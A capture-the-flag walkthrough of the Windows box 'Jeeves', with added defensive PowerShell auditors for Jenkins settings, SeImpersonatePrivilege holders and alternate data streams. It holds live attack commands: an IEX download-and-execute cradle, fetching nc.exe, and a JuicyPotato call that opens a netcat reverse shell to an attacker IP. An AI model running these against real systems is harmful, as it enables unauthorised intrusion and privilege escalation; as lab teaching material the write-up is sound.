# Jeeves

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/bJONPGEA6fsahrZVvCKZ/image.png)

## Reconnaissance <a href="#id-491d" id="id-491d"></a>

First we want to run an initial nmap scan to see what ports are open and what services are running on those ports.

```bash
nmap -sC -sV -oA nmap/init 10.129.174.184
```

* **-sC**: run default nmap scripts
* **-sV**: detect service versions
* **-oA**: output in all three formats (.nmap, .gnmap, .xml) with the base name *nmap/init*

We get back the following information:

{% code title="init.nmap" %}

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-24T05:19:57
|_  start_date: 2022-03-24T05:08:21
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 seconds
```

{% endcode %}

## Enumeration

### Passive Enumeration

#### IIS Directory Enumeration

```bash
gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt
```

#### Jetty Directory Enumeration

```bash
# write to a separate file so the IIS results above are not overwritten
gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o jetty.txt
```

### Active Enumeration

#### Exploring IIS

Looking at the HTTP site on port 80, we are presented with a search bar.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/iKKPd8gwik1UFirUGsCb/image.png)

Searching takes you to error.html, which turns out to be just an image.

![error.html](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/mp8hhmgy3rPP08bVY3Hv/image.png)

Source code for the site; the form action simply points to error.html, so the search box does nothing server-side:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Ask Jeeves</title>
  <link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
  <form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
    <input type="text" placeholder="Search here..." required>
    <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
  </form>
</body>

</html>
```

#### Exploring Jetty

Quickly checking the gobuster results for Jetty shows that we have a directory to check out.

![/askjeeves](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/bQjeziRVzGeKo4LFFipe/image.png)

Going there we see Jenkins!

![Jenkins](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/19OZXZCE3OPocTK5pVcA/image.png)

It turns out the Jenkins script console gives us command execution without needing to be logged in, which works in our favor.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/NdCJaKVDKVVohchie01U/image.png)
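The root cause here is a Jenkins instance whose authorization strategy lets anonymous users reach the script console. The following PowerShell function is an added example, not part of the writeup or the Jenkins project: it audits a Jenkins `config.xml` for the settings that produce that state. It assumes the usual `JENKINS_HOME\config.xml` layout, with `<useSecurity>`, `<securityRealm class="...">` and `<authorizationStrategy class="...">` elements under the `<hudson>` root; the sample file it writes is constructed for the demonstration and is not taken from the target.

```powershell
# Added example (not from the writeup or Jenkins): flag a Jenkins config.xml
# that leaves the script console reachable without logging in.
# Assumption: <hudson> root with <useSecurity>, <securityRealm> and
# <authorizationStrategy class="..."> children.
function Test-JenkinsSecurityConfig {
    param([Parameter(Mandatory)][string]$Path)

    [xml]$cfg = Get-Content -Path $Path -Raw
    $root = $cfg.hudson
    $findings = @()

    # With useSecurity off, Jenkins never asks anyone to log in.
    if ("$($root.useSecurity)" -ne 'true') {
        $findings += 'useSecurity is not true: no authentication is enforced'
    }

    # The Unsecured strategy grants every visitor full control, /script included.
    $strategy = "$($root.authorizationStrategy.class)"
    if (-not $strategy -or $strategy -like '*AuthorizationStrategy$Unsecured*') {
        $findings += "authorizationStrategy is '$strategy': anonymous users get full control, including the script console"
    }

    # No realm means there is no account database to authenticate against.
    if (-not $root.securityRealm) {
        $findings += 'no securityRealm configured'
    }

    [pscustomobject]@{
        Path     = $Path
        Secure   = ($findings.Count -eq 0)
        Findings = $findings
    }
}

# Constructed sample mirroring an unsecured instance; not a real file from the box.
$sample = @'
<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
</hudson>
'@
$tmp = Join-Path ([IO.Path]::GetTempPath()) 'jenkins-config-sample.xml'
Set-Content -Path $tmp -Value $sample
Test-JenkinsSecurityConfig -Path $tmp | Format-List
```

A hardened instance reports `Secure : True`: `useSecurity` is `true`, a security realm is set, and the authorization strategy is anything other than `Unsecured` (for example a matrix or project-based strategy that does not grant `Overall/Administer` to anonymous). Pointing the function at the real `config.xml` on a Jenkins host gives a quick check before the script console is ever exposed.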

## Initial Access

Using the Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box.

{% embed url="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" %}

First we want to copy the example invocation to the bottom of the script, so that the function is called as soon as the script is loaded on the machine we are attacking.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/zrsynLTpNmerMQ9nvnos/image.png)

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/7KKqusQBeUuq8G99Fws7/image.png)

Next we want to get a web server running and a netcat listener to catch the reverse shell. In this case I am using [updog](https://github.com/sc0tfree/updog) for my simple web server.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/nkaUvPFDtzHrZF2cHWPl/image.png)

Using the script console again, I run this command to download and execute the Invoke-PowerShellTcp reverse shell script.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/jZOrcoKlFCXWSe6aZtmI/image.png)

And we get a shell back!

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/JT938rSo6OJGl79deu5W/image.png)

This allows us to get user.txt!

## Privilege Escalation

### Juicy Potato

Next we want to run PowerUp.ps1; we use the dev branch as it has extra checks.

{% embed url="https://github.com/PowerShellMafia/PowerSploit/tree/dev" %}

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/1YLxtHJYJkO5hldlL2aV/image.png)

Then we want to run these commands in our reverse shell:

```powershell
# load PowerUp.ps1 into memory from our web server
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.92/PowerUp.ps1')
# run every PowerUp privilege escalation check
Invoke-AllChecks
```

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/mScPaZGjzYofCxfGoSV2/image.png)

Right away we see that our user holds SeImpersonatePrivilege, which means this box is vulnerable to Juicy Potato!

{% embed url="https://github.com/ohpe/juicy-potato" %}
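From the defensive side, the useful question is which accounts on a host actually hold SeImpersonatePrivilege. The function below is an added example, not part of the writeup, PowerUp or Juicy Potato: it parses a `secedit /export` INF file, whose `[Privilege Rights]` section lists each user right as `SeImpersonatePrivilege = *SID,*SID,...`, and resolves the SIDs to account names. The INF fragment it writes is constructed so the parser can be run without an elevated shell; omit `-InfPath` to export the live local policy instead (which does need elevation).

```powershell
# Added example (not from the writeup): list the accounts granted a user right
# by parsing a secedit INF export. Assumption: the "[Privilege Rights]" section
# uses the "Privilege = *SID,*SID" layout that secedit writes.
function Get-PrivilegeHolders {
    param(
        [string]$Privilege = 'SeImpersonatePrivilege',
        # Existing INF export to parse; omit to export the live policy (needs elevation).
        [string]$InfPath
    )

    if (-not $InfPath) {
        $InfPath = Join-Path $env:TEMP 'local-policy.inf'
        secedit /export /cfg $InfPath | Out-Null
    }

    $line = Get-Content -Path $InfPath | Where-Object { $_ -match "^\s*$Privilege\s*=" }
    if (-not $line) { return @() }

    # Right-hand side is a comma-separated list of SIDs, each prefixed with '*'.
    $sids = ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object { $_.Trim().TrimStart('*') }

    foreach ($sid in $sids) {
        try {
            $account = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch {
            $account = '<unresolved>'   # not a Windows host, or a SID from another machine
        }
        [pscustomobject]@{ Privilege = $Privilege; Sid = $sid; Account = $account }
    }
}

# Constructed INF fragment in the secedit layout (default Windows assignment).
$sample = @'
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
'@
$tmp = Join-Path ([IO.Path]::GetTempPath()) 'policy-sample.inf'
Set-Content -Path $tmp -Value $sample
Get-PrivilegeHolders -InfPath $tmp | Format-Table -AutoSize
```

On a Windows host the constructed sample resolves to NT AUTHORITY\SERVICE, LOCAL SERVICE, NETWORK SERVICE and BUILTIN\Administrators. The first of those is why a Jenkins service account holds the right by default: every account logged on as a service is a member of the SERVICE group. The practical mitigation is therefore not to strip the right from that group but to avoid running an internet-facing application such as Jenkins as a Windows service account when it can run under a constrained, dedicated identity, and to patch the application itself, since impersonation only becomes a problem once an attacker already has code execution as that account.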

We first need to download JuicyPotato.exe to the box; I am hosting it from my Kali box.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/AM3bUjDOYNwpjLyeyOVa/image.png)

We also need to copy Kali's nc.exe to the Windows box:

```powershell
# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"
```

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/lcs1MNF8ARfrXubBpkpZ/image.png)

Next we want to run JuicyPotato!

This is the input I used:

* **-t:** \*
* **-p:** c:\windows\system32\cmd.exe
* **-a:** "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001"
* **-l:** 9001

```powershell
cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *
```

![Got a shell](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/8D8JGZ943LB32rKhO3wH/image.png)

We got nt authority\system!

When we take a look at the Administrator's desktop we see hm.txt with an interesting message.

![](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/XHd8yzx3akwE1Vs3nADd/image.png)

Then I tried this

![Alternate Data Streams](https://content.gitbook.com/content/ue6nb9INP8oovJ2WDb8T/blobs/Uz0ae4wB8w29p43LZFIF/image.png)

The extra `root.txt` stream on hm.txt is an Alternate Data Stream; find out more about them here:

{% embed url="https://owasp.org/www-community/attacks/Windows_alternate_data_stream" %}

<details>

<summary>We can direct this into more and get the flag</summary>

```
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only first 16 bytes of hash shown
```

</details>
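Because the `dir /r` trick only works one directory at a time, a defender hunting for this kind of hidden content wants to sweep a whole tree. The following function is an added example, not part of the writeup: it walks a directory, reports every file carrying a stream other than the default `:$DATA` one, and shows the first line of each stream's content, which is the PowerShell equivalent of the `more < hm.txt:root.txt` step above. The temp folder, `hm.txt` and its `root.txt` stream are constructed for the demonstration; it needs an NTFS volume on Windows.

```powershell
# Added example (not from the writeup): find files that carry alternate data
# streams and preview their content. Needs NTFS on Windows.
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)][string]$Root,
        # Zone.Identifier is the browser mark-of-the-web and is very common; skip it unless asked.
        [switch]$IncludeZoneIdentifier
    )

    Get-ChildItem -Path $Root -File -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        # Get-Item -Stream * lists every NTFS stream, the main one being ':$DATA'.
        Get-Item -Path $file.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |
            Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
            ForEach-Object {
                [pscustomobject]@{
                    File    = $file.FullName
                    Stream  = $_.Stream
                    Length  = $_.Length
                    Preview = (Get-Content -Path $file.FullName -Stream $_.Stream -TotalCount 1 -ErrorAction SilentlyContinue)
                }
            }
    }
}

# Constructed demonstration: a file whose visible text is a decoy and whose real
# content sits in a named stream, mirroring hm.txt:root.txt on the box.
$dir = Join-Path ([IO.Path]::GetTempPath()) 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$hm = Join-Path $dir 'hm.txt'
Set-Content -Path $hm -Value 'The flag is elsewhere.'
Set-Content -Path $hm -Stream 'root.txt' -Value 'constructed-sample-not-the-real-flag'
Find-AlternateDataStreams -Root $dir | Format-Table -AutoSize
```

Run against a user profile or a web root, the output is short enough to eyeball; anything beyond `Zone.Identifier` on a file that has no business carrying extra streams is worth a closer look, which is the indicator-of-compromise angle mentioned in the lessons below.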

## Lessons Learned

* Restrict who can access the Jenkins script console and management pages; leaving them open to anonymous users hands out command execution on the host
* In some instances a file using alternate data streams could be an indicator of compromise
* Be careful of which service users have SeImpersonatePrivilege, as this could allow an attacker to easily escalate their privileges
